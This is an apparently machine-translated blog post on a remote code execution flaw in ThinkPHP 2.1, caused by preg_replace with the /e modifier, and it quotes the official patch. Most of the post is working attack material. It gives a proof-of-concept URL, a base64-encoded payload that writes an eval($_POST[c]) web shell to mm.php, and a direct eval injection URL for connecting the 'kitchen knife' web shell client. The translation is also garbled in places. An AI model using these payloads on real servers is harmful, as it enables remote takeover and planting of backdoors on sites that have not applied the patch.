Thinkphp 2.1 latest Vulnerability

Thinkphp 2.1
 
Let's analyze the vulnerability.
 
Officially Released a security patch
 
This URL security vulnerability can cause users to forge URLs on the client and execute illegal code.
 
Official patch:
 
/Trunk/ThinkPHP/Lib/Core/Dispatcher. class. php
 
 
 
125-$ res = preg_replace ('@ (w + )'. $ depr. '([^ '. $ depr. '/] +) @ E',' $ var ['\ 1'] = "\ 2";', implode ($ depr, $ paths ));
125 + $ res = preg_replace ('@ (w + )'. $ depr. '([^ '. $ depr. '/] +) @ E',' $ var ['\ 1'] =' \ 2'; ', implode ($ depr, $ paths ));
 
 
 
This code parses pathinfo as a restful type url. It is mainly used to parse the data in pathinfo and merge it into the $ _ GET array.
However, when using regular expressions to parse pathinfo, the following statement is used:
 
 
 
$ Res = preg_replace ('@ (w + )'. $ depr. '([^ '. $ depr. '/] +) @ E',' $ var ['\ 1'] = "\ 2";', implode ($ depr, $ paths ));
 
 
 
The/e parameter of preg_replace is obviously used here, which is a very dangerous parameter. If this parameter is used, the second parameter preg_replace will be executed as php code, in this way, the author uses PHP code to dynamically assign values to arrays in the second parameter.
 
'$ Var [' \ 1'] = "\ 2 ″;'
 
Here is double quotation marks, and the php variable syntax in double quotation marks can be parsed and executed. Therefore, attackers can execute arbitrary PHP code by accessing any application written using the thinkphp framework as follows:
 
Index. php/module/action/param1/$ {@ print (THINK_VERSION )}
 
The execution result is as follows:
 
 
 
That is to say
 
Print () can execute arbitrary code.
 
Other functions such as phpinfo ()
 
That's all.
 
We can directly use
 
Fputs and fopen functions are directly written as Trojans.
 
Construct a statement
 
Fputs (fopen (base64_decode ("bW0ucGhw"), "w"), base64_decode ("PD9ldmFsKCRfUE9TVFtjXSk7Pz4 = "))
 
Base64_decode ("bW0ucGhw") After decoding is mm. php
 
Base64_decode ("PD9ldmFsKCRfUE9TVFtjXSk7Pz4 =") After decoding is <? Eval ($ _ POST [c]);?>
 
Once executed, a Trojan file of mm. php can be generated in this directory.
 
However, an error occurred during the operation.
 
 
 
The double quotation marks are escaped.
 
Then I tried several other codes that do not use double quotation marks to write horses.
 
All failed because <> Angle brackets and so on are escaped and used
 
Exec () and other system command execution functions cannot be written.
 
The method of using the Internet seems to be very rare. Only the Method of Using echo to write horses
 
However, the double quotation marks are not escaped before they can be successfully written.
 
What should I do?
 
At this time, don't stick to it too much.
 
How can a Chinese man forget the software kitchen knife written by the Chinese?
 
Directly construct code
 
 
 
Http://www.bkjia.com/project/xaa/index. php/module/action/param1/$ {@ print (eval ($ _ POST [c])}
 
 
 
Enter the path and password C in the kitchen knife to connect.
 
 
 



 
 
You don't have to stick to writing horses at all.
 
Author: Seay's blog applets guard information security,